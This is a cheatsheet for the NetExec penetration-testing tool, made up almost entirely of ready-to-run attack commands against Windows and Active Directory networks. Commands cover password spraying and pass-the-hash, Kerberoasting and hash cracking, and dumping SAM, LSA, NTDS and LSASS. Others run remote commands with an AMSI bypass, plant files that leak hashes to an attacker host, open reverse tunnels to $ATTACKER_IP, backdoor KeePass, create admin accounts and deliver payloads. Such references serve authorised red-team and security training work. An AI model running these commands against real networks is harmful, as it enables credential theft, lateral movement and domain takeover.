NetExec Cheatsheet

Net Exec Commands, Protocols, options, modules

Installation

# Install nxc via pipx (recommended)

$ pipx install netexec

# Install nxc from source

$ git clone https://github.com/Pennyw0rth/NetExec && cd NetExec && pipx install .

General Usage

# Scan a single target

$ nxc $PROTOCOL $IP

# Scan multiple targets inline

$ nxc $PROTOCOL $IP1 $IP2 $IP3

# Scan a subnet

$ nxc $PROTOCOL $IP/24

# Scan targets from a file

$ nxc $PROTOCOL targets.txt

# Scan a hostname or FQDN

$ nxc $PROTOCOL $FQDN

# Get help for a specific protocol

$ nxc $PROTOCOL --help

# List available modules for a protocol

$ nxc $PROTOCOL -L

# Show options for a specific module

$ nxc $PROTOCOL -M $MODULE --options

# Export results to a file

$ nxc $PROTOCOL $IP [options] --export $(pwd)/export.txt

# Set thread count for concurrent scanning

$ nxc $PROTOCOL $IP/24 -t $THREADS

Authentication

# Authenticate with domain username and password

$ nxc $PROTOCOL $IP -u $USER -p $PASSWORD -d $DOMAIN

# Authenticate with a local account (non-domain)

$ nxc $PROTOCOL $IP -u $USER -p $PASSWORD --local-auth

# Authenticate with NTLM hash (Pass-the-Hash)

$ nxc $PROTOCOL $IP -u $USER -H $NTLM_HASH

# Authenticate with AES key (Pass-the-Key / Kerberos)

$ nxc $PROTOCOL $IP -u $USER --aesKey $AES_KEY

# Authenticate using Kerberos ccache ticket from KRB5CCNAME

$ nxc $PROTOCOL $IP -u $USER --use-kcache

# Authenticate with Kerberos and specify KDC host

$ nxc $PROTOCOL $DC_FQDN -u $USER -p $PASSWORD -k --kdcHost $DC_FQDN

# Set per-user failure limit to avoid lockouts

$ nxc $PROTOCOL $IP -u users.txt -p passwords.txt --ufail-limit 2

Credential Spraying

# Spray one password against a list of users

$ nxc smb $IP -u users.txt -p $PASSWORD -d $DOMAIN

# Spray multiple users inline with one password

$ nxc smb $IP -u $USER1 $USER2 $USER3 -p $PASSWORD

# Spray a user list against a password list (full bruteforce)

$ nxc smb $IP -u users.txt -p passwords.txt

# Pair users with passwords 1:1 (no bruteforce)

$ nxc smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Continue spraying after a valid credential is found

$ nxc smb $IP -u users.txt -p $PASSWORD --continue-on-success

# Spray local accounts

$ nxc smb $IP -u $USER -p $PASSWORD --local-auth

# Check bad password count to assess lockout risk

$ nxc smb $IP -u $USER -p $PASSWORD --users

# LDAP password spray (FQDN required, not IP)

$ nxc ldap $DC_FQDN -u users.txt -p $PASSWORD

# MSSQL spray with domain credentials

$ nxc mssql $IP -u users.txt -p $PASSWORD -d $DOMAIN

# MSSQL spray with local Windows accounts

$ nxc mssql $IP -u users.txt -p $PASSWORD -d .

# MSSQL spray with SQL accounts

$ nxc mssql $IP -u users.txt -p $PASSWORD --local-auth

# WinRM spray

$ nxc winrm $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

# Change an expired password (STATUS_PASSWORD_MUST_CHANGE)

$ smbpasswd -r $IP -U $USER

SMB Reconnaissance

# Basic SMB scan - get OS info, signing, domain membership

$ nxc smb $IP/24

# Generate list of hosts with SMB signing disabled (relay targets)

$ nxc smb $IP/24 --gen-relay-list relay_targets.txt

# Enumerate password policy via null session

$ nxc smb $IP -u '' -p '' --pass-pol

# Export password policy to JSON

$ nxc smb $IP -u '' -p '' --pass-pol --export $(pwd)/passpol.txt

# Enumerate domain users via null session

$ nxc smb $IP -u '' -p '' --users

# Enumerate domain users with valid credentials

$ nxc smb $IP -u $USER -p $PASSWORD --users

# Enumerate shares via null session

$ nxc smb $IP -u '' -p '' --shares

# Enumerate shares with guest account

$ nxc smb $IP -u guest -p '' --shares

# Enumerate shares with valid credentials

$ nxc smb $IP -u $USER -p $PASSWORD --shares

# Enumerate sessions on target

$ nxc smb $IP -u $USER -p $PASSWORD --sessions

# Enumerate logged-on users on target

$ nxc smb $IP -u $USER -p $PASSWORD --loggedon-users

# Filter logged-on users by name or regex

$ nxc smb $IP -u $USER -p $PASSWORD --loggedon-users --loggedon-users-filter $FILTER

# Enumerate domain computers (performs LDAP request internally)

$ nxc smb $IP -u $USER -p $PASSWORD --computers

# Enumerate local groups (or members of a specific group)

$ nxc smb $IP -u $USER -p $PASSWORD --local-groups

# Enumerate domain groups

$ nxc smb $IP -u $USER -p $PASSWORD --groups

# Enumerate members of a specific domain group

$ nxc smb $IP -u $USER -p $PASSWORD --groups "$GROUP_NAME"

# Enumerate disks on target

$ nxc smb $IP -u $USER -p $PASSWORD --disks

# Brute-force RIDs to enumerate users and groups (default up to RID 4000)

$ nxc smb $IP -u $USER -p $PASSWORD --rid-brute

# Brute-force RIDs with a custom maximum RID

$ nxc smb $IP -u $USER -p $PASSWORD --rid-brute $MAX_RID

# Issue a WMI query (default namespace: root\cimv2)

$ nxc smb $IP -u $USER -p $PASSWORD --wmi "$WMI_QUERY"

# Issue a WMI query against a custom namespace

$ nxc smb $IP -u $USER -p $PASSWORD --wmi "$WMI_QUERY" --wmi-namespace "$WMI_NAMESPACE"

LDAP Enumeration

# Enumerate domain users via LDAP

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --users

# Enumerate domain groups via LDAP

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --groups

# Find accounts with PASSWD_NOTREQD flag (may have empty or short passwords)

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --password-not-required

# Find accounts trusted for unconstrained Kerberos delegation

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --trusted-for-delegation

# Find accounts with adminCount=1 (protected privileged accounts)

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --admin-count

# Get the domain SID

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --get-sid

# Enumerate gMSA (Group Managed Service Account) passwords

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --gmsa

# Retrieve LAPS passwords for managed computers

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M laps

# Check if LDAP signing and channel binding are required

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M ldap-checker

# Get Machine Account Quota (number of machines a user can join to the domain)

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M MAQ

# Enumerate AD Certificate Services enrollment servers and templates

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M adcs

# Read user descriptions (may contain passwords) with default keywords

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M user-desc

# Read user descriptions using custom keywords

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M user-desc -o KEYWORDS=$KW1,$KW2

# Read DACLs on a specific AD object

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M daclread -o TARGET=$TARGET_USER

# Enumerate AD subnet and site information

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M subnets

# Collect all network info from LDAP

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M get-network -o ALL=true

Kerberos Attacks

# ASREPRoast without credentials using a user list

$ nxc ldap $DC_FQDN -u users.txt -p '' --asreproast asreproast.out

# ASREPRoast all vulnerable accounts with valid credentials

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --asreproast asreproast.out

# Crack ASREPRoast hashes with hashcat

$ hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt

# Kerberoast all SPN accounts with valid credentials

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --kerberoasting kerberoast.out

# Crack Kerberoast hashes with hashcat

$ hashcat -m 13100 kerberoast.out /usr/share/wordlists/rockyou.txt

# Authenticate using a Kerberos ccache (no password needed)

$ nxc smb $IP --use-kcache

# Authenticate using an AES key

$ nxc smb $IP -u $USER --aesKey $AES_KEY

GPO Credential Hunting

# Find plaintext credentials in Group Policy Preferences (GPP)

$ nxc smb $IP -u $USER -p $PASSWORD -M gpp_password

# Find autologin credentials stored in registry.xml via GPP

$ nxc smb $IP -u $USER -p $PASSWORD -M gpp_autologin

SMB File Operations

# Spider a share for files matching a pattern (e.g. txt)

$ nxc smb $IP -u $USER -p $PASSWORD --spider $SHARE_NAME --pattern $PATTERN

# Spider a share and list all files and directories (regex .)

$ nxc smb $IP -u $USER -p $PASSWORD --spider $SHARE_NAME --regex .

# Spider a share and search file contents with a regex

$ nxc smb $IP -u $USER -p $PASSWORD --spider $SHARE_NAME --content --regex $REGEX

# Spider all shares and dump file listing to JSON (spider_plus module)

$ nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL

# Download all readable files from shares (spider_plus)

$ nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL READ_ONLY=false

# Download a file from a share

$ nxc smb $IP -u $USER -p $PASSWORD --share $SHARE_NAME --get-file $REMOTE_FILE $LOCAL_FILE

# Upload a file to a share

$ nxc smb $IP -u $USER -p $PASSWORD --share $SHARE_NAME --put-file $LOCAL_FILE $REMOTE_FILE

Command Execution

# Execute a CMD command via SMB (default: wmiexec -> atexec -> smbexec -> mmcexec)

$ nxc smb $IP -u $USER -p $PASSWORD -x "$CMD"

# Execute a PowerShell command via SMB

$ nxc smb $IP -u $USER -p $PASSWORD -X "$PS_CMD"

# Force a specific execution method (wmiexec, smbexec, atexec, mmcexec)

$ nxc smb $IP -u $USER -p $PASSWORD --exec-method $EXEC_METHOD -x "$CMD"

# Execute a PowerShell command with a custom AMSI bypass

$ nxc smb $IP -u $USER -p $PASSWORD -X "$PS_CMD" --amsi-bypass $AMSI_BYPASS_FILE

# Execute a CMD command via WinRM

$ nxc winrm $IP -u $USER -p $PASSWORD -x "$CMD"

# Execute a PowerShell command via WinRM

$ nxc winrm $IP -u $USER -p $PASSWORD -X "$PS_CMD"

# Execute a command via SSH

$ nxc ssh $IP -u $USER -p $PASSWORD -x "$CMD"

# Execute a command via SSH with a private key

$ nxc ssh $IP -u $USER --key-file $KEY_PATH -p "" -x "$CMD"

# Enable UAC bypass for non-RID-500 local admins (sets LocalAccountTokenFilterPolicy=1)

$ nxc smb $IP -u $USER -p $PASSWORD --local-auth -x "reg add HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"

Credential Dumping

# Dump SAM database (local hashes)

$ nxc smb $IP -u $USER -p $PASSWORD --sam

# Dump LSA secrets

$ nxc smb $IP -u $USER -p $PASSWORD --lsa

# Dump NTDS.dit from Domain Controller (requires DA or replication rights)

$ nxc smb $DC_IP -u $USER -p $PASSWORD --ntds

# Dump NTDS for only enabled accounts

$ nxc smb $DC_IP -u $USER -p $PASSWORD --ntds --enabled

# Dump NTDS for a specific user account only

$ nxc smb $DC_IP -u $USER -p $PASSWORD --ntds --user $TARGET_USER

# Dump credentials via lsassy (LSASS dump + pypykatz parse, marks owned in BloodHound)

$ nxc smb $IP -u $USER -p $PASSWORD -M lsassy

# Dump credentials via nanodump (evasive LSASS dump)

$ nxc smb $IP -u $USER -p $PASSWORD -M nanodump

# Dump credentials via procdump (marks owned in BloodHound)

$ nxc smb $IP -u $USER -p $PASSWORD -M procdump

MSSQL

# Authenticate to MSSQL with domain credentials

$ nxc mssql $IP -u $USER -p $PASSWORD -d $DOMAIN

# Authenticate to MSSQL with a SQL account

$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth

# Run a SQL query

$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth -q "$SQL_QUERY"

# Execute a system command via MSSQL (xp_cmdshell, requires DBA)

$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth -x "$CMD"

# Upload a file to target via MSSQL

$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth --put-file $LOCAL_FILE $REMOTE_PATH

# Download a file from target via MSSQL

$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth --get-file $REMOTE_PATH $LOCAL_FILE

# Enumerate and escalate MSSQL privileges (EXECUTE AS LOGIN / db_owner)

$ nxc mssql $IP -u $USER -p $PASSWORD -M mssql_priv

# Escalate privileges using mssql_priv module

$ nxc mssql $IP -u $USER -p $PASSWORD -M mssql_priv -o ACTION=privesc

# Roll back mssql_priv escalation

$ nxc mssql $IP -u $USER -p $PASSWORD -M mssql_priv -o ACTION=rollback

RDP

# Test RDP credentials across a subnet

$ nxc rdp $IP/24 -u $USER -p $PASSWORD -d $DOMAIN

# Take a screenshot of the NLA-disabled RDP login prompt (no creds needed)

$ nxc rdp $IP --nla-screenshot

# Take a screenshot after successful RDP connection

$ nxc rdp $IP -u $USER -p $PASSWORD --screenshot --screentime $SECONDS --res 1280x720

Hash Stealing & NTLM Relay

# Drop an LNK file on writeable shares to capture NTLMv2 hashes (requires Responder)

$ nxc smb $IP -u $USER -p $PASSWORD -M slinky -o SERVER=$ATTACKER_IP NAME=$FILENAME

# Cleanup slinky LNK files after hash capture

$ nxc smb $IP -u $USER -p $PASSWORD -M slinky -o NAME=$FILENAME CLEANUP=YES

# Drop a searchConnector-ms file to coerce WebDAV/SMB auth (requires ntlmrelayx)

$ nxc smb $IP -u $USER -p $PASSWORD -M drop-sc -o URL=\\\\$ATTACKER_IP\\$SHARE SHARE=$SHARE_NAME FILENAME=$FILENAME

# Cleanup drop-sc files

$ nxc smb $IP -u $USER -p $PASSWORD -M drop-sc -o CLEANUP=True FILENAME=$FILENAME

# Crack captured NTLMv2 hashes with hashcat

$ hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt

Coercion Attacks

# Coerce authentication via DFSCoerce

$ nxc smb $IP -u $USER -p $PASSWORD -M dfscoerce -o LISTENER=$ATTACKER_IP

# Coerce authentication via ShadowCoerce

$ nxc smb $IP -u $USER -p $PASSWORD -M shadowcoerce -o LISTENER=$ATTACKER_IP

# Check for noPac vulnerability (CVE-2021-42278/42287)

$ nxc smb $IP -u $USER -p $PASSWORD -M nopac

Pivoting with Chisel

# Start chisel reverse SOCKS server on attacker host

$ ./chisel server --reverse

# Upload chisel.exe to compromised Windows host via SMB

$ nxc smb $IP -u $USER -p $PASSWORD --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe

# Start chisel client on compromised host to establish reverse SOCKS tunnel

$ nxc smb $IP -u $USER -p $PASSWORD -x "C:\\Windows\\Temp\\chisel.exe client $ATTACKER_IP:8080 R:socks"

# Start chisel as a server on the Windows target (alternative direction)

$ nxc smb $IP -u $USER -p $PASSWORD -x "C:\\Windows\\Temp\\chisel.exe server --socks5"

# Connect to chisel server running on Windows target from Linux

$ sudo chisel client $IP:8080 socks

# Kill the chisel process on the target when done

$ nxc smb $IP -u $USER -p $PASSWORD -X "Stop-Process -Name chisel -Force"

BloodHound & ADCS

# Collect BloodHound data via LDAP

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M bloodhound

# Mark owned users in BloodHound

$ nxc smb $IP -u $USER -p $PASSWORD -M bh_owned -o BLOODHOUND_HOST=$BH_HOST

# Enumerate AD Certificate Services templates

$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M adcs

KeePass

# Discover KeePass processes running on target

$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_discover

# Add a malicious export trigger to KeePass

$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=ADD

# Restart KeePass to activate the trigger

$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=RESTART

# Poll for exported KeePass credentials

$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=POLL

# Cleanup KeePass trigger after extraction

$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=CLEAN

Misc Modules

# Enable or disable RDP via nxc module

$ nxc smb $IP -u $USER -p $PASSWORD -M rdp -o ACTION=enable

# Resolve additional interface IPs via DCOM (find hidden NICs)

$ nxc smb $IP -u $USER -p $PASSWORD -M ioxidresolver

# Create a local admin account on the target

$ nxc smb $IP -u $USER -p $PASSWORD -M createadmin -o USERNAME=$NEW_USER PASSWORD=$NEW_PASSWORD

# Deliver and execute payload via web_delivery module

$ nxc smb $IP -u $USER -p $PASSWORD -M web_delivery -o URL=$PAYLOAD_URL

# Enumerate AD subnet and site information

$ nxc smb $IP -u $USER -p $PASSWORD -M subnets

IPv6

# Target a host over IPv6

$ nxc smb $IPV6_ADDR -u $USER -p $PASSWORD

Database (nxcdb)

# Open the nxc credential database

$ nxcdb

# Switch to SMB protocol table

$ nxcdb (default) > proto smb

# List stored credentials

$ nxcdb (default)(smb) > creds

# Create a new workspace

$ nxcdb (default) > workspace create $WORKSPACE_NAME

# Switch to a workspace

$ nxcdb (default) > workspace $WORKSPACE_NAME

# List all workspaces

$ nxcdb (default) > workspace list

# Return to default workspace

$ nxcdb (custom) > workspace default